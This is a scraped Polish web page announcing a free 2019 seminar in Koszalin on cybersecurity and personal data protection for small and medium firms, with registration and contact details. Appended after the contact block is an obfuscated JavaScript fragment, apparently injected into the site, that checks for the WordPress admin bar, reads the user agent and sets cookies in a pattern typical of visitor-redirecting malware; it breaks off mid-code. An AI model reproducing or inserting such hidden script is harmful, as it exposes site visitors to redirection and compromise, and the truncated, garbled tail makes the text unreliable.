CYBERBEZPIECZEŃSTWO I RYZYKO INFORMACYJNE DLA ZBIORÓW DANYCH W WARUNKACH POSTĘPUJĄCEJ CYFRYZACJI ŻYCIA ORAZ GOSPODARKI | Północna Izba Gospodarcza w Koszalinie

W imieniu Fundacji Nauka dla Środowiska prowadzącej TechKlub Koszalin serdecznie zapraszam na bezpłatne spotkanie pt. „CYBERBEZPIECZEŃSTWO I RYZYKO INFORMACYJNE DLA ZBIORÓW DANYCH W WARUNKACH POSTĘPUJĄCEJ CYFRYZACJI ŻYCIA ORAZ GOSPODARKI, SZCZEGÓLNIE W MAŁYCH I ŚREDNICH FIRMACH ORAZ OCHRONA DANYCH OSOBOWYCH W SIECI INTERNET” Spotkanie odbędzie się w ramach 17. Środkowopomorskich Targów Pracy AutoStore Job Fair 2019.

Liczba miejsc ograniczona, obowiązuje rejestracja:  https://crm.sektor3-0.pl/techklub/koszalin

Spotkanie odbędzie się 21 marca o godzinie 13:00 w siedzibie Hali Widowiskowo-Sportowej ul. Śniadeckich 4 sala konferencyjna na parterze

Fundacja Nauka dla Środowiska
ul. Racławicka 15-17
75-620 Koszalin, Poland
tel. 94 347 82 05
www.ndsfund.org
Ośrodek Wsparcia Ekonomii Społecznej 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m